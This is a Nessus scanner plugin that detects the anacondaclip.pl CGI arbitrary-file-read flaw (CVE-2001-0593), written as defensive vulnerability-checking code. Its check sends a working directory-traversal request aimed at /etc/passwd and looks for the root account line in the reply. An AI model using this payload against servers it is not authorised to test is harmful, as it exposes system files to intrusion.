home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / anacondaclip.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  73 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10644);
  10.  script_bugtraq_id(2512);
  11.  script_cve_id("CVE-2001-0593");
  12.  script_version ("$Revision: 1.18 $");
  13.  name["english"] = "anacondaclip CGI vulnerability";
  14.  name["francais"] = "anacondaclip";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "The CGI script 'anacondaclip', which
  18. comes with anacondaclip.pl, is installed on this machine. This CGI has
  19. a well known security flaw that allows an attacker to read arbitrary
  20. files on the remote system with the privileges of the HTTP daemon (usually 
  21. root or nobody).
  22.  
  23. Solution : Remove the 'anacondaclip' script from your web server's CGI 
  24. directory (typically cgi-bin/).
  25.  
  26. Risk factor : High";
  27.  
  28.  
  29.  
  30.  script_description(english:desc["english"]);
  31.  
  32.  summary["english"] = "Checks for the presence of anacondaclip.pl";
  33.  summary["francais"] = "VΘrifie la prΘsence de anacondaclip.pl";
  34.  
  35.  script_summary(english:summary["english"], francais:summary["francais"]);
  36.  
  37.  script_category(ACT_GATHER_INFO);
  38.  
  39.  
  40.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
  41.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
  42.  family["english"] = "CGI abuses";
  43.  family["francais"] = "Abus de CGI";
  44.  script_family(english:family["english"], francais:family["francais"]);
  45.  script_dependencie("find_service.nes", "no404.nasl");
  46.  script_require_ports("Services/www", 80);
  47.  exit(0);
  48. }
  49.  
  50. #
  51. # The script code starts here
  52. #
  53.  
  54. include("http_func.inc");
  55. include("http_keepalive.inc");
  56.  
  57. port = get_http_port(default:80);
  58.  
  59.  
  60. if(!get_port_state(port))exit(0);
  61.  
  62. foreach dir (cgi_dirs())
  63. {
  64. req = http_get(item:string(dir, "/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd"),
  65.            port:port);
  66. buf = http_keepalive_send_recv(port:port, data:req);
  67. if(buf == NULL)exit(0);
  68. if(egrep(pattern:".*root:.*:0:[01]:.*", string:buf)){
  69.     security_hole(port);
  70.     exit(0);
  71.     }
  72. }
  73.